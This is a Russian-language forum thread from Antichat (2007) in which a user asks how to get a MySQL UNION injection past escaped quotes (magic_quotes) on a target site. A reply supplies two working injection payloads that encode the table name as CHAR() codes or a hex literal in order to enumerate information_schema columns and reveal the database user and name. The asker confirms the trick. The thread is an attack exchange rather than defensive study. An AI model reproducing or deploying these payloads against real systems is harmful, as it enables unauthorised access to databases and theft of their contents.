ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Обход кавычки в mysql-inj?
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Обход кавычки в mysql-inj?
  #1  
Старый 20.11.2007, 03:56
UID: 42552
USER: orcismylife
orcismylife
Познающий
Регистрация: 01.10.2007
Сообщений: 40
Провел на форуме:
172670

Репутация: 15
По умолчанию Обход кавычки в mysql-inj?
Версия
5.0.22-log

Нужно обойти кавычку...

=====
При построении запроса:

+union+select+1,column_name,3,4,5,6,7,8,user(),10, database(),12,13+from+information_schema.columns+w here+table_name='USER_PRIVILEGES'+limit+1,1/*

=====
Мускул выдает, что:

<...> '\'USER_PRIVILEGES\' limit 1,1/*' at line 1

Мэджик квотес судя по всему включены... Обойти как-то можно?

ЗЫ. Пробовал перевести в хекс - не получилось.
 

  #2  
Старый 20.11.2007, 03:59
UID: 29833
USER: Constantine
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию
Что значит не получилось в хекс перевести?
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 

  #3  
Старый 20.11.2007, 04:11
UID: 42552
USER: orcismylife
orcismylife
Познающий
Регистрация: 01.10.2007
Сообщений: 40
Провел на форуме:
172670

Репутация: 15
По умолчанию
переверсти в хекс получилось, результат запроса не изменился
 

  #4  
Старый 20.11.2007, 04:14
UID: 14895
USER: +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
Надеюсь ты ковычки тоже в хекс не переводил...
__________________
 

  #5  
Старый 20.11.2007, 04:18
UID: 28932
USER: Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
вот тебе два варианта:
+union+select+1,column_name,3,4,5,6,7,8,user(),10, database(),12,13+from+information_schema.columns+w here+table_name=CHAR(85,83,69,82,95,80,82,73,86,73 ,76,69,71,69,83)+limit+1,1/*

+union+select+1,column_name,3,4,5,6,7,8,user(),10, database(),12,13+from+information_schema.columns+w here+table_name=0x555345525F50524956494C45474553+l imit+1,1/*
__________________
Карфаген должен быть разрушен...
 

  #6  
Старый 20.11.2007, 04:27
UID: 42552
USER: orcismylife
orcismylife
Познающий
Регистрация: 01.10.2007
Сообщений: 40
Провел на форуме:
172670

Репутация: 15
По умолчанию
йа дибилко. забыл про char().. всем огромное спасибо.
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL injection в MySql сервере версии 3,x bandera Чужие Статьи 3 04.06.2006 16:17
Общие Рекомендации Защиты (MySQL и SQL Web-интерфейс) k00p3r Чужие Статьи 0 13.06.2005 11:22
Защищаем MySql. Шаг за шагом k00p3r Чужие Статьи 0 13.06.2005 11:18



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ